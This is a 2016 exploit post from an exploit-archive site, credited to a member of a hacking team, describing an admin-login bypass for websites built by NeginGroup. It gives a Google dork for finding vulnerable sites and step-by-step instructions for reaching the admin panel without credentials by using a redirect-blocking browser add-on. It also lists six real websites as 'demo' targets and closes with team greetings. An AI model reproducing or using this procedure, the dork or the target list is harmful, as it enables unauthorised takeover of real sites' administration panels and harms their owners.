NeginGroup Bypass Admin Scrpit Iran

2016.05.20
Credit: 1337r00t
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################## # Exploit Title: Bypass Admin Scrpit Iran [NeginGroup] #1337r00t - T34m d4rkn3ss R00m # Dork Google : inurl:/view_page.php " intext:طراحی و اجرا توسط نگین گروپ | Designed by Negingroup.com # We Are Hackers Saudi Arabia # Home: http://www.negingroup.com/ # Discovered By: 1337r00t # Tested on : FireFox ########################### |[+]----------------------------------------------------------------------------------|[+] # # Admin UrL :- # # [$site]/manager/login.php # Or # [$site]/fa/manager/login.php ########################### # # p0c:- # 1- Download NoRedirect # 2- Run Tool NoRedirct From FireFox # 3- Click on Add # 4- Add in the first link ^ # 5- Then type the path link [Admin] # 6- Delete The Path /manager/login.php [Or] /fa/manager/login.php # 7- Then replace /manager/index.php [Or] fa/manager/index.php # 8- OK Then go to this path /manager/index.php [or] /fa/manager/index.php # # |[+]----------------------------------------------------------------------------------|[+] | Demo :- | | 1- http://hfb-gatab.ir/manager/login.php | 2- http://taxisabzevar.ir/manager/login.php | 3- http://irgillette.com/manager/login.php | 4- http://www.sh-chb.ir/fa/manager/login.php | 5- http://e-sabzevar.ir/fa/manager/login.php | 6- http://rde-sabzevar.ir/manager/login.php | ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|| |[+] G2 Team :- |[+] Members: T34m D4rkn3ss R00m:- |[+] 1- Nine9 |[+] 2- [C]oder Girl: Safaa Hacker |[+] 3- xIL3zr |[+] 4- FreeDom |[+] 5- MjHoL HackEr |[+] 6- Hurabii HaCkEr |[+] 7- BL4ck M4n |[+]-------------------------------------------[+] |[+] G2 Friends : Killer~X - SraB HaCkEr -3NeeDaN HacKeR - Saudi HeX - 1337kSa - All My Friends |[+] ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|| |[+] Twitter : 1337r00t |[+] Instagram : 1337r00t ||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top